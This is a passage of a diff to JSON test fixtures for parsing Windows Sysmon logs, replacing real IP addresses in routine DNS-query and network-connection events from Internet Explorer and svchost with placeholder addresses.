SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event" }, "log": { @@ -2489,7 +2489,7 @@ "ProcessId": "2736", "QueryName": "dsum-sec.casalemedia.com", "QueryStatus": "0", - "QueryResults": "type: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;", + "QueryResults": "type: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.290" }, @@ -2500,7 +2500,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2509,7 +2509,7 @@ { "@timestamp": "2021-05-05T15:30:51.699Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2525,7 +2525,7 @@ "ProcessId": "2736", "QueryName": "ocsp.godaddy.com", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;" + "QueryResults": "type: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;" }, "computer_name": "vagrant-2016", "version": 5, @@ -2684,7 +2684,7 @@ "ProcessId": "2736", "QueryName": "ocsp.usertrust.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -2705,7 +2705,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2719,7 +2719,7 @@ "version": 5, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;", + "QueryResults": "type: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.343", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2747,7 +2747,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2776,7 +2776,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;", + "QueryResults": "type: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.391", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2789,7 +2789,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2849,7 +2849,7 @@ "ProcessId": "2736", "QueryName": "ocsp.sectigo.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "level": "information", @@ -2871,7 +2871,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -2947,7 +2947,7 @@ "ProcessGuid": "{42f11c3b-0bad-5c8c-0000-0010dfbc0000}", "User": "NT AUTHORITY\\NETWORK SERVICE", "SourceIsIpv6": "true", - "SourceIp": "a00:20f:0:0:18a2:6e00:e0:ffff", + "SourceIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "DestinationPortName": "domain", "DestinationIsIpv6": "true", "UtcTime": "2019-03-18 16:57:47.847", @@ -2956,7 +2956,7 @@ "SourcePort": "62141", "Image": "C:\\Windows\\System32\\svchost.exe", "Protocol": "udp", - "DestinationIp": "a00:203:3000:3000:3000:3000:3000:3300" + "DestinationIp": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "channel": "Microsoft-Windows-Sysmon/Operational", "opcode": "Info", @@ -2972,7 +2972,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT 